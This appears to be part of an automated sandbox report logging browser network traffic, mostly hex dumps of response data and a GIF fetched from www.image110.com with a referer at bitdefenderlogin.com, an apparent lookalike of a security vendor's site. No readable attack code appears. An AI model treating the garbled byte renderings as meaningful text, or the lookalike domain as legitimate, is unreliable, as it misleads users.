                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 80 55 18 e4 8f 7e ce 21 55 e3 09 5c 96 75 1c 9d 2d e2 e8 2d 52 cf f5 dc 40 22 d4 e0 d4 45 9f 9c 7c a6 0e d0 81 15 e0 0e a4 71 81 6d e4 9d 12 54 45 b0 ac 99 b9 f8 0e 0e 5c 1d 66 71 c1 6c b2 00 1e 3c 16 85 7a d5 47 58 c1 11 dc 00 cc ad 9a 70 26 86 a0 22 27 61 18 8c 15 98 c5 06 5c 80 f5 c1 5a 74 da e8 43 5e a2 14 ae 47 4e 5a 27 0a 6d 57 7e 4c 9b 79 24 94 ea 65 e4 10 31 0d ce 1c d4 e8 c1 d7 79 8e 47 7a 62 c8 1a b6 87 b4 a1 d4 7d fa 93 19 62 d4 80 c2 5e 7d cc 24 b7 d1 5e ec 05 58 81 46 08 29 10 c9 52 25 0d f0 e1 48 17 45 88 3b f8 c8 7c 10 e5 8d 78 d8 90 20 28 86 4c a2 25 22 dd 85 56 22 b3 52 8f 3e 52 0f 2f e0 81 45 6c 28 5d 7c 04 1f 18 0a 30 62 95 30 00 c1 c3 b9 44 9d f0 c2 1a 98 4b 4a 90 a5 ea 00 81 25 4d 23 64 46 eb a3 da a8 25 be 00 3f 16 8f 56 8c 40 01 59
                                                                                                                                                          Data Ascii: U~!U\u--R@"E|qmTE\fql<zGXp&"'a\ZtC^GNZ'mW~Ly$e1yGzb}b^}$^XF)R%HE;|x (L%"V"R>R/El(]|0b0DKJ%M#dF%?V@Y
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: fb e4 54 b4 5c 89 a3 dd 0e ca e3 55 fd 11 8b 6a 3c 89 ae b8 c0 a4 f0 b7 06 25 d4 80 ab 8b d4 84 41 0f 2d 18 85 f5 d0 26 3d db 69 ad 57 34 95 48 13 68 00 ce 68 57 f5 31 06 b5 3d 89 e3 ab 3e 8b 30 d6 a1 43 5b b4 2d 56 0d 4d c8 51 33 89 42 1c 08 4f 30 8d 72 f0 c1 70 64 d3 a1 7b d7 6d 2d 08 16 70 c8 7f c8 b9 8e 23 08 26 20 d3 e6 1b 5c 83 d4 0e bb 35 09 e2 d1 db 89 55 9f 81 25 08 d0 c3 8a e4 f8 57 ed f0 41 c0 3c dd b0 0d 5b bf 5c 8e ec 1c 59 d7 7d dd 91 0d ca 82 80 05 9d 04 59 d8 bd 5d ef 90 ae ad 20 41 d9 0a c5 95 fd 8f ff cc 73 59 53 cc 0c 54 d4 b7 f6 bc 4b 9b 2d d4 97 68 8b 8c 8a 8a a4 e5 bf c4 81 55 00 8c da e7 da 89 4e 38 2a a9 58 9c b2 64 1c a2 65 16 b9 8b 16 ea 75 4b ab 85 9a a9 e5 87 93 3d 89 ac 22 89 46 e2 5a b1 b0 55 bd ac 8b b2 f5 4d 14 14 39 15 c4
                                                                                                                                                          Data Ascii: T\Uj<%A-&=iW4HhhW1=>0C[-VMQ3BO0rpd{m-p#& \5U%WA<[\Y}Y] AsYSTK-hUN8*XdeuK="FZUM9
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 5c 91 40 e8 f9 4a b0 a4 b5 8b 20 c6 f8 e9 4f b3 34 8a 60 fc 00 fd a3 ba 0f 13 cf b0 64 28 b7 c4 0a 6a cc 1a 7f 69 32 bd f4 8a 38 30 0c 2a 88 50 82 e0 cb c5 03 c7 bf 14 8c c9 09 cc 6f 0b 3d 70 63 bf 61 0a bd ea 24 51 e9 3c d1 cd 5c 4d 05 e3 01 5e 20 2a 01 a0 00 50 2a 88 3e 4c d1 8b e0 b7 82 98 26 c7 5c 4d c4 34 51 1e 65 bf bb 6a 4c 89 f8 81 26 aa 08 3d 64 08 3c 74 89 ef ab 08 1a 85 4c 9c cc cc 88 c8 82 1b 28 2b e2 54 bf 88 60 81 d7 e4 82 50 59 34 82 88 43 98 a4 88 4b 43 d1 e5 c4 49 97 2c 43 97 c8 0e 28 a8 83 8d 0c 2a 11 55 43 ff 10 05 d1 25 0c 90 4f ec 4e 39 85 31 60 89 89 71 99 53 01 d4 2c a4 e1 ba 17 7c 4a 2f ba 8b a7 4c 4a 31 12 9b 79 3a a3 61 f3 9a 4c 4c 89 6f c1 15 9e ac 15 fd 04 cb 0c 5c 1f 88 1a c0 00 75 46 1f e1 b1 17 d4 40 fb 01 2c 23 c8 ca 48 0d
                                                                                                                                                          Data Ascii: \@J O4`d(ji280*Po=pca$Q<\M^ *P*>L&\M4QejL&=d<tL(+T`PY4CKCI,C(*UC%ON91`qS,|J/LJ1y:aLLo\uF@,#H
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: e4 64 d6 82 08 07 7f 24 94 cc 1c c7 c0 54 56 70 fd 4c c6 74 d3 7f c8 82 2f e5 88 0d d0 48 86 60 81 f6 42 d3 62 d5 18 82 50 57 93 e0 56 df 6c 4c 9c 33 85 eb 5c c4 6b 65 08 2f e0 af 0d d8 00 21 88 80 91 c4 39 8b 6c c3 93 d0 0d 91 2b d6 71 64 51 49 11 80 22 15 88 85 79 41 32 51 d8 77 fd 48 ff 85 3d 31 3d c5 0e 79 fd 8e 2f c0 0e 3c e8 94 4b 09 59 91 8d 8e 3f 1d 8b f5 c3 ba 8f 42 54 f4 33 54 92 7a c6 f6 93 88 f7 93 ca ad 92 bf d5 aa ad 93 e8 0f ff 78 c5 fa b8 28 62 f4 54 b4 44 50 81 c8 01 9e 12 d0 fd 43 81 53 fd 07 57 35 a6 ba 0b 50 fb e4 54 b4 5c 89 a3 dd 0e ca e3 55 fd 11 8b 6a 3c 89 ae b8 c0 a4 f0 b7 06 25 d4 80 ab 8b d4 84 41 0f 2d 18 85 f5 d0 26 3d db 69 ad 57 34 95 48 13 68 00 ce 68 57 f5 31 06 b5 3d 89 e3 ab 3e 8b 30 d6 a1 43 5b b4 2d 56 0d 4d c8 51 33
                                                                                                                                                          Data Ascii: d$TVpLt/H`BbPWVlL3\ke/!9l+qdQI"yA2QwH=1=y/<KY?BT3Tzx(bTDPCSW5PT\Uj<%A-&=iW4HhhW1=>0C[-VMQ3
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: ca ab 32 d6 c3 c9 c1 84 8f a3 e3 86 c1 04 3d ec 6a 42 8f dc 2e f8 58 c2 c6 64 ab 6a ca 42 7d 2c 08 96 ac cc 61 a2 cc d0 b3 2b bb 32 ba c2 fc 43 c3 e4 cc 21 9a be 8a a8 03 93 94 08 28 78 c8 b5 62 3d 9a 92 b4 d3 b4 88 2c 64 bd 2c 54 c9 7f 30 85 0d 40 49 8e c4 4c 86 60 02 13 aa 03 28 b8 80 91 9c 88 ff 4d 50 03 86 20 cd 89 08 8e d0 49 4c 8f 94 c8 f5 10 3f 6e 02 ba 80 94 4d 35 84 0d 26 64 4e 29 fa b4 9f 14 9a ad cc 45 0e 7c b1 e7 c0 ce 68 09 35 ec 31 46 52 4c ad b0 50 c6 0e c3 b5 82 20 cb 09 d4 3b 57 e3 07 f6 24 4f 8e 88 cf f7 1c 0b 5c 91 40 e8 f9 4a b0 a4 b5 8b 20 c6 f8 e9 4f b3 34 8a 60 fc 00 fd a3 ba 0f 13 cf b0 64 28 b7 c4 0a 6a cc 1a 7f 69 32 bd f4 8a 38 30 0c 2a 88 50 82 e0 cb c5 03 c7 bf 14 8c c9 09 cc 6f 0b 3d 70 63 bf 61 0a bd ea 24 51 e9 3c d1 cd 5c
                                                                                                                                                          Data Ascii: 2=jB.XdjB},a+2C!(xb=,d,T0@IL`(MP IL?nM5&dN)E|h51FRLP ;W$O\@J O4`d(ji280*Po=pca$Q<\
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 8e 08 34 e6 10 3d ce 08 30 88 49 1f 7e 84 34 7e 44 d1 ff 82 f8 4d 44 82 85 9c c4 8e 49 94 94 2d e8 0e 4d bc d3 14 e8 c9 e9 e8 03 3c bd d3 d3 b0 ba 4f a4 96 47 82 cb f0 a4 08 4a d2 08 b0 e3 ba 4c 22 3b a9 3c 3b 9b 08 25 23 8a 54 49 65 04 0e 54 8f 49 bd 54 4d 32 a4 58 e2 09 02 b5 bb a9 68 4b 81 e8 84 9d c0 80 5b 8c 3b fd c4 45 b9 6b 32 74 3b 89 e6 f2 4f b4 04 55 d8 10 0b 66 93 14 da 82 ca 86 e8 0a 17 a0 26 10 84 88 7e 1b a5 0f f8 80 73 c9 cb 86 e8 11 6e 78 52 80 d1 d0 1a 05 51 c0 f4 47 be 4c 4c d6 6c 88 27 95 33 10 a5 51 c5 78 d2 e4 64 d6 82 08 07 7f 24 94 cc 1c c7 c0 54 56 70 fd 4c c6 74 d3 7f c8 82 2f e5 88 0d d0 48 86 60 81 f6 42 d3 62 d5 18 82 50 57 93 e0 56 df 6c 4c 9c 33 85 eb 5c c4 6b 65 08 2f e0 af 0d d8 00 21 88 80 91 c4 39 8b 6c c3 93 d0 0d 91 2b
                                                                                                                                                          Data Ascii: 4=0I~4~DMDI-M<OGJL";<;%#TIeTITM2XhK[;Ek2t;OUf&~snxRQGLLl'3Qxd$TVpLt/H`BbPWVlL3\ke/!9l+
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 10 dc 14 12 94 41 40 5b 3a 5b 21 3b da d9 8b 4e 91 c8 b5 9b c1 ff 52 eb 34 d4 2a 80 1a ac b4 a4 63 c2 bb a8 c8 ab d3 8b 1b 94 8b 59 3a 8c 27 4c c9 8c 14 b4 44 53 8c 94 74 95 bf 60 c2 18 5c c9 ce 18 ae b8 d3 88 d0 98 bb 6b a9 02 11 10 39 56 cc c3 cc 7b 45 11 90 3c f5 92 86 3f 5c 84 4a d0 bc 38 5c ca 39 84 43 30 7c 3c e5 e0 49 9f 74 45 a0 d4 bc 56 34 c4 00 d8 c2 a0 0c 4a 5f 63 0e 5d d3 43 ac 1c 2f f9 90 8f d5 d3 36 84 69 a8 8b 41 21 ad b4 ca b5 dc c2 b4 dc ca c1 43 4b 07 d2 43 ba a4 cb 31 dc c2 ba cc 4b 5e 53 18 3b b0 ca 08 da 42 29 90 80 78 63 4b b8 6c cb cc 93 98 6e 7b c5 a0 24 4c c5 d4 c2 7c 43 4c 53 80 4b dc 33 85 2b a0 4c cb ac 4c cc bc 4c cd c4 cc b3 d4 bd 80 b1 3e 84 fb c5 62 1c 46 63 2c cd 61 2c 89 8c 53 82 40 61 8a 73 38 07 73 48 09 67 ec 9b 6a 8c
                                                                                                                                                          Data Ascii: A@[:[!;NR4*cY:'LDSt`\k9V{E<?\J8\9C0|<ItEV4J_c]C/6iA!CKC1K^S;B)xcKln{$L|CLSK3+LLL>bFc,a,S@as8sHgj
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 02 bd 48 95 13 68 95 55 89 95 57 a9 95 59 c9 95 5b e9 95 5d 09 ff 96 5f 29 96 5d 39 96 65 19 96 67 69 96 69 c9 95 53 99 8a 98 f0 94 4f 49 06 65 80 82 2d 01 0c 1a 50 8c c6 58 7a 8f 56 70 7b c9 97 7d e9 97 7f 09 98 81 29 98 83 49 98 85 69 98 87 89 98 89 39 83 06 57 7a 77 39 07 c0 b0 3a b0 00 04 0c a3 08 bc 00 8f 93 06 63 99 a9 99 9b c9 99 9d e9 99 9f 09 9a a1 29 9a a3 49 9a a5 69 9a a7 89 9a a9 39 84 18 67 8d 40 80 0c f2 08 06 f5 d8 3a 3a d7 12 d5 33 93 33 b7 90 9f 68 52 a0 a8 90 4f 48 9b 6e a8 7b 41 26 85 4d 97 93 2d f9 89 1d 59 9b b9 e9 51 ca 69 89 cc 39 14 24 19 9c f7 57 51 d5 53 87 db e7 9b a0 48 93 44 d1 74 1b 75 7f b8 69 87 93 58 51 c3 f9 91 d0 09 9c da d7 9d c8 a9 12 6c 47 9b f6 a7 5a c4 59 9d d4 73 9b 5f f7 5a 45 82 05 4d 29 03 a4 f0 94 a4 d0 94 6e
                                                                                                                                                          Data Ascii: HhUWY[]_)]9egiiSOIe-PXzVp{})Ii9Wzw9:c)Ii9g@::33hROHn{A&M-YQi9$WQSHDtuiXQlGZYs_ZEM)n
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: ee 48 30 ea c3 80 50 4d d8 0f 0b 50 aa 39 02 01 15 8c 80 39 62 e1 c3 4c a1 ac c2 5c ce 92 e6 8e fe 03 3b 94 03 d0 d6 aa 44 76 ae e5 da ff 65 38 a4 0c 41 32 58 89 aa 0f 92 f8 ec 7c 9d ae a5 99 6e 22 5d 2e 51 18 ab 4e 69 eb 0d 71 eb 48 a4 26 d3 72 6d 2f dc cd b3 9a eb d5 e6 26 2b 92 86 d7 7e 2d d4 9a a2 95 3e 81 6e 12 0e 91 da 53 b9 ee 2e b8 72 2d 91 02 de 6d 0a a2 44 24 6b c3 94 48 28 20 6c 2d b4 d1 82 88 27 46 3c 0f 10 ea 51 8b 58 2f f6 6a ef 9d fa e4 ba f4 4e ea a4 af ba 6c af 49 00 ac e0 be 2f 11 12 6e c3 50 c0 48 84 81 4c b0 00 a3 85 d5 3f e8 c0 cd 54 85 30 20 28 8b 78 57 2c b1 ea ae 92 2a c9 95 e8 8c 5a 2e 8c a2 a3 1f ea 5a e9 2a 92 c5 f8 ec af 92 5c 50 cc 28 37 fc 6a c9 a1 ee 42 d4 68 f7 a0 4d 3a f2 ec 06 c7 1e d0 da c8 89 ee 54 a4 dc 26 f0 ee ee b3
                                                                                                                                                          Data Ascii: H0PMP99bL\;Dve8A2X|n"].QNiqH&rm/&+~->nS.r-mD$kH( l-'F<QX/jNlI/nPHL?T0 (xW,*Z.Z*\P(7jBhM:T&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          26192.168.2.549744103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:35 UTC602OUTGET /uploads/zuobian.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:35 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:35 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 181313
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:26:03 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfcb-2c441"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:35 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:35 UTC16036INData Raw: 47 49 46 38 39 61 80 00 0e 02 f7 ff 00 ff ef 43 af 8f 63 cd 9e 71 bc e7 ef 91 b5 f7 93 24 35 cf d8 d6 59 2a 59 1d 34 8a 05 29 ef 6b 8d fd 6e 94 93 4c 6f fb b7 cb cc 13 2b 6e ae 31 46 cf e8 ce fe 00 00 26 45 91 ca de f3 de ee ed 2f 56 ff 5c 6d 94 a4 cc b5 b5 74 7b ad de f7 64 4c 28 d1 7b 7b e7 ef ee f6 f1 73 0a c6 e4 d8 ae 85 93 2e 46 ae b0 b4 e9 da 39 61 d0 e7 2c 4b 63 ee f2 d3 ea b7 8d 9f 6b 9c 27 30 6f 95 af af da 8d 97 d3 d6 b5 dd e8 ae d1 b1 b1 0d 23 56 f5 d2 aa 01 b2 ed b0 b9 c7 b1 8c 90 91 73 4a 06 92 d5 2f 2d 29 06 15 48 88 60 30 8a 95 aa dd f7 fa 91 8f 8a 5b 82 fc 74 16 29 cb be c8 30 29 55 f3 4e 53 6e 72 72 a2 bd f9 4f 86 7c ed f0 91 19 42 ff ec f7 ee 70 23 36 f7 fc e6 8b d6 ee 74 69 4e 4b 4b 48 0a 09 0b 45 6c 6f ea 75 79 cf b2 3e a9 c8 f8 f1 c6
                                                                                                                                                          Data Ascii: GIF89aCcq$5Y*Y4)knLo+n1F&E/V\mt{dL({{s.F9a,Kck'0o#VsJ/-)H`0[t)0)UNSnrrO|Bp#6tiNKKHElouy>
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 50 6a fe d0 9a fc a2 0d 4e da 81 26 d1 9a 21 c3 eb c5 4e a6 a9 dc 28 1a 05 a8 45 a3 47 89 cb 09 c1 42 8c 34 8b 4a 0c 00 56 50 db 9f 1c 03 ac 79 c6 63 79 52 e6 61 85 87 86 92 80 01 d8 5d e8 e7 a2 51 96 d6 f4 0c 5f a6 e8 c1 34 1d 3d b6 e8 04 f5 43 02 b0 01 c4 38 cc 78 8e dc 78 5e a0 85 4d c6 84 3e 4e 93 5c c7 2d 8c cc 14 5d 07 2f b8 82 23 b5 65 2d e0 42 27 e1 02 00 6d 9e 4c 15 a5 47 64 16 47 ac e0 4a 31 e9 b3 f8 85 b3 3c e9 8a 4a 5a f7 c5 ce 39 1d 08 05 1a aa 6a 1d 48 a4 30 e6 2d 2c c8 52 3d 85 06 b6 67 b6 69 06 f0 40 09 2f ac a9 59 c8 9a 71 d5 1a 67 f4 1f 80 81 c4 2f d4 e9 a8 9e e3 25 01 a0 9e a2 ea 6a a2 4e d3 0d c6 77 02 49 45 1d 48 36 18 88 27 f4 c8 90 30 c0 84 bd e4 b3 b5 5c 53 c8 84 d3 d9 0a 60 f0 c2 bc 6d 85 c0 15 ca 31 4c 99 40 44 56 64 21 e7 27 79
                                                                                                                                                          Data Ascii: PjN&!N(EGB4JVPycyRa]Q_4=C8xx^M>N\-]/#e-B'mLGdGJ1<JZ9jH0-,R=gi@/Yqg/%jNwIEH6'0\S`m1L@DVd!'y
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 53 4b 41 58 a1 1a 10 04 03 d0 02 35 b8 28 72 f9 18 29 1d 35 b3 53 b7 e5 04 31 0e ab d0 34 2b 4c 0c 55 55 4e 0c 41 58 08 45 87 7c 55 35 4c 43 63 e8 84 41 43 47 f9 a0 c1 5b b4 81 de 83 99 af 08 8c 16 70 06 19 e8 9b 3d 90 85 c7 7c cf 22 88 87 78 78 07 74 80 85 49 b0 02 41 70 86 49 f0 81 70 30 80 ad 23 81 fb 5c 82 49 50 8a 29 68 00 20 48 81 12 08 81 98 24 b6 a8 ca 9b c4 d0 01 75 1b 55 2f 34 bb c1 44 b3 82 24 3f 78 8b 39 d4 eb 44 35 5d 48 34 94 55 58 38 82 10 18 b4 0a aa 48 b2 59 08 fd 3b 00 cd cc d3 60 15 08 35 e8 04 40 6d 81 16 e8 81 31 58 81 06 28 82 7c d8 cf 14 80 d8 4a 00 31 25 58 02 1c 88 87 f0 e9 04 6e 50 03 41 78 07 dc a4 80 1e 58 01 1d a8 01 88 39 8e 8f 48 82 63 1c bb 0f 5b 37 51 fd b0 0f 6c 57 0e 20 53 78 c3 d0 56 53 3b 0e f0 44 58 95 46 58 55 43 86
                                                                                                                                                          Data Ascii: SKAX5(r)5S14+LUUNAXE|U5LCcACG[p=|"xxtIApIp0#\IP)h H$uU/4D$?x9D5]H4UX8HY;`5@m1X(|J1%XnPAxX9Hc[7QlW SxVS;DXFXUC
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 0c d0 85 f2 98 4b 79 ad f0 93 e2 10 83 98 91 48 cf 08 d0 f9 07 28 1e c0 85 d0 a5 a4 31 20 4b cc 4b fc 64 1f aa 39 c0 ff 05 30 69 12 66 5c b0 09 5e c8 20 0e bf 2a 89 17 a8 d0 05 ab 18 25 40 9d 41 05 10 c6 a1 8e 75 10 92 90 ee 52 22 2d 1e d9 3b 59 70 60 24 45 e0 c5 3f 78 61 8c 22 6c f3 92 3a f8 95 ca f6 a3 b8 56 fc 29 54 4c 12 e5 47 7e 45 9d c8 88 0e 61 f1 39 c9 01 5a 41 02 0b 84 61 6a 7e 5a 1c 4e ee e9 99 18 f0 02 51 7b 98 81 0c d4 40 85 e4 1d 0f 90 a5 ca 92 3a e0 95 50 be 3d a8 36 09 65 e2 3f 22 69 21 5e 70 93 9b 97 34 06 2c 38 20 88 5f 45 ee 26 15 fc e4 e2 a4 76 ac 2e 22 06 32 26 1a d6 03 c6 56 92 1c ea f0 00 74 b0 80 31 70 b0 c5 27 d5 64 26 24 18 4b 03 0c 30 09 1d f4 c0 00 06 68 80 1a a0 b5 11 51 79 66 2c b5 bb 19 de 20 a4 c8 7f 10 10 a2 ad 32 86 31 b4
                                                                                                                                                          Data Ascii: KyH(1 KKd90if\^ *%@AuR"-;Yp`$E?xa"l:V)TLG~Ea9ZAaj~ZNQ{@:P=6e?"i!^p4,8 _E&v."2&Vt1p'd&$K0hQyf, 21
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 14 d4 64 fb 89 ff 70 fc 0f 07 ac 71 4b 32 ca 1a 9c e1 86 45 c7 fd 38 17 1d 36 d0 51 ba 21 46 18 c1 c9 f3 5d 39 ff a3 59 28 9c a4 08 f6 3e 38 4e 42 62 89 47 68 96 0f 07 ec c1 2f 98 01 cf 54 20 7c 34 1d 50 35 5a 74 68 42 97 f8 5d c4 f5 f5 45 1c ad 54 03 89 b2 ff 13 ff bb ee 1b 23 b3 b1 ed 58 23 c0 95 c4 21 65 37 38 c3 bd 94 90 1c 8b 44 aa 75 16 52 04 e9 0c 61 10 83 48 d0 0b 07 f8 91 22 ca e4 00 ec 5d cf 37 60 31 8b e5 ca d2 8a 03 c0 47 0a 4c e3 d2 55 74 02 02 4b 70 02 10 2e f4 81 21 64 c6 03 10 ec 61 0f 51 e8 9a c3 e8 f7 8f 1a e0 80 16 ca b0 dd 3b 28 a0 b6 da fd a3 4f 6e 3b a2 dc 04 a8 b2 52 cc e0 0e 3d 80 40 0f 70 a0 84 bd 44 01 32 56 b0 d0 6f 20 e8 93 2d 1a 62 8b ad 80 0c 4a 52 a2 18 9f a0 e0 2b df fb 60 83 0e b0 15 9a 58 42 4b 7b 68 e3 3f 38 21 c7 39 16
                                                                                                                                                          Data Ascii: dpqK2E86Q!F]9Y(>8NBbGh/T |4P5ZthB]ET#X#!e78DuRaH"]7`1GLUtKp.!daQ;(On;R=@pD2Vo -bJR+`XBK{h?8!9
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 80 11 1e 46 40 1c 30 e4 80 84 0b 1b 36 5c f8 68 15 d3 45 2b 14 95 34 b9 70 60 28 0a 0f 91 9c 40 ba 89 e3 e5 9f a6 99 2e 62 26 5d ea 74 a9 c2 a8 0a ff b9 e8 c2 04 87 84 a9 12 1d b8 48 d8 8a eb 57 ae 28 0e 98 e4 21 70 20 da 7f 07 50 20 f8 47 62 92 92 2e 33 d4 c0 9d a4 46 4d 17 20 4c 24 fe f3 71 f2 9f ca 82 07 cf 9a 35 f8 60 4f 19 40 24 5a ff 59 69 ac e8 a9 c2 4a 16 98 cc f4 2b 12 44 94 38 ff 8c d2 f9 27 33 a9 8d a4 a0 9f 3a e5 ba 70 6a 9d 24 9a 1c 48 60 cb 76 a0 a2 af 5f bb 4e 24 cb 63 a0 40 83 27 0f 1e f8 aa 88 84 96 48 5f 04 fc 0b a0 a5 13 86 3b 63 e2 4d 62 08 11 ad 6e 81 20 a4 48 01 6c 98 8b 14 34 9e 6d 84 09 43 c2 47 63 99 9f d5 5c a8 64 c3 47 1c 46 5d 8c 68 8e e3 06 2d 1d 1b 48 3f 87 16 af 94 34 57 17 28 56 7d d0 41 c2 01 02 6c 21 10 20 55 b2 f5 84 13
                                                                                                                                                          Data Ascii: F@06\hE+4p`(@.b&]tHW(!p P Gb.3FM L$q5`O@$ZYiJ+D8'3:pj$H`v_N$c@'H_;cMbn Hl4mCGc\dGF]h-H?4W(V}Al! U
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 69 5f 7e 41 c2 5d 69 c2 75 00 75 08 03 1b 98 bc 07 8d d4 80 f5 53 f6 3b 5d 17 66 c5 18 de e9 dc 75 61 17 86 61 9f 76 61 de dd 43 2f 30 04 9d 0d 6a 9f 2e 04 25 00 04 25 88 02 24 8c 5b 2f 40 42 2f 36 e7 dc e3 e8 96 7b 39 e0 05 e7 28 18 4e 3b ad d3 7f a0 03 9e 3d 67 3f 55 47 e6 24 81 96 f6 87 1e 90 00 79 a6 cc 07 be e9 5d 86 bc 56 38 80 fa cd d4 4c 15 db 7f 58 c2 0f 04 e1 07 9d e9 2b 9e 64 49 96 64 43 c8 d9 c6 d4 e9 37 bc c3 3b 15 c7 ae 46 05 aa 1e 3b 8e 36 50 90 04 5e db fb e8 38 f8 d1 53 d6 04 90 ec d7 e0 dd 55 ca 2c cf 5e fd 07 3f c6 de 39 16 e4 93 d6 40 5c 3d 5d 4e 28 00 4f 0d 53 d2 3d 00 df 43 80 56 80 c9 c9 1d 40 ff bb e2 61 e6 5c 3c 9d dd d8 7d df 70 14 dd 3b 74 b9 ff 9a 23 df ad db d7 dc 9b 64 0d d4 df aa 64 c5 71 76 88 cb de 59 e1 e5 d7 5d f6 40 18
                                                                                                                                                          Data Ascii: i_~A]iuuS;]fuaavaC/0j.%%$[/@B/6{9(N;=g?UG$y]V8LX+dIdC7;F;6P^8SU,^?9@\=]N(OS=CV@a\<}p;t#ddqvY]@
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: b9 7f a8 51 63 30 80 05 00 50 c2 d4 d1 55 64 4a e0 ac c8 b6 15 d1 9b dd 55 99 95 5b 5e 2d 54 29 b8 59 2e b0 84 03 b0 82 1a 48 02 82 6d 44 ff 8f e8 8e c0 f5 50 ee 2c 05 ef 9c 58 0e ed d4 6c 15 d1 56 68 c6 4c 5c c6 e7 95 dc 05 dc c4 b7 e4 43 45 50 04 12 c0 01 03 70 86 8e a5 00 35 9d 51 0e c8 87 06 28 db 96 ed cf dd db 53 b5 f5 cd b6 75 dd 8d f8 d5 5d 15 54 b9 bd 52 5f ad 5b 29 b0 04 29 28 04 03 a4 03 25 e8 02 08 1d da 26 25 13 37 f8 4e 23 38 5c f1 54 de 88 cd d6 4e 65 da 34 5c 60 6e 95 de b7 34 4f 1e ac c8 ee 0b 83 4d 50 87 8e 8d 87 12 a8 d1 23 f8 07 75 b0 00 4f 44 80 fd ec c3 57 84 45 85 10 47 3e ac 57 8e 10 52 5e fd 55 b9 65 04 46 58 e1 07 d8 55 4b 28 03 40 70 01 2b 58 82 33 b8 01 05 6b 52 ed 50 a7 0e 25 da 0e 6d 96 b5 ec 54 21 0d 52 23 f0 01 17 50 84 ee
                                                                                                                                                          Data Ascii: Qc0PUdJU[^-T)Y.HmDP,XlVhL\CEPp5Q(Su]TR_[))(%&%7N#8\TNe4\`n4OMP#uODWEG>WR^UeFXUK(@p+X3kRP%mT!R#P
                                                                                                                                                          2024-06-09 22:40:36 UTC16384INData Raw: 99 24 81 53 6c ca d8 84 04 da 34 c5 c2 b4 87 09 c8 cd e2 79 07 51 98 83 3b f4 4d f9 2c 48 df 3c 45 bf 1c 4e 09 00 04 40 50 05 14 45 51 b1 8c b3 cc 3c a7 63 22 a6 b4 5c c0 72 ab 34 0c f8 07 63 92 1e a0 18 26 23 f8 07 1e f0 02 46 f0 02 23 30 82 03 f0 02 1b 70 80 ef 1c 4e a6 44 00 24 d5 c6 3b 2c cf 18 98 80 f3 2c 1a 75 88 07 73 c8 ca 39 8c 49 25 35 48 af cc 46 07 40 81 42 e0 84 32 28 84 32 28 d3 32 10 53 42 98 bb 19 28 05 ff 18 65 ce 73 6c b6 e6 23 84 04 84 28 70 41 98 7f 30 02 1e e0 81 7f 60 04 1e 30 02 2f 10 52 43 c8 4b 54 94 00 92 04 51 14 20 54 27 3d c3 4d 10 03 ef 2a 1a 0e 88 87 10 98 43 26 1c 45 f7 4c 0a 3c fc 4d 3c 44 01 40 28 03 34 40 03 39 f8 54 4f ed 54 4c 78 ae 86 03 39 e5 24 a6 6e 91 41 57 54 bf 62 9a 30 a0 2b 05 23 c8 4f 46 f0 51 2f 88 03 46 30
                                                                                                                                                          Data Ascii: $Sl4yQ;M,H<EN@PEQ<c"\r4c&#F#0pND$;,,us9I%5HF@B2(2(2SB(esl#(pA0`0/RCKTQ T'=M*C&EL<M<D@(4@9TOTLx9$nAWTb0+#OFQ/F0
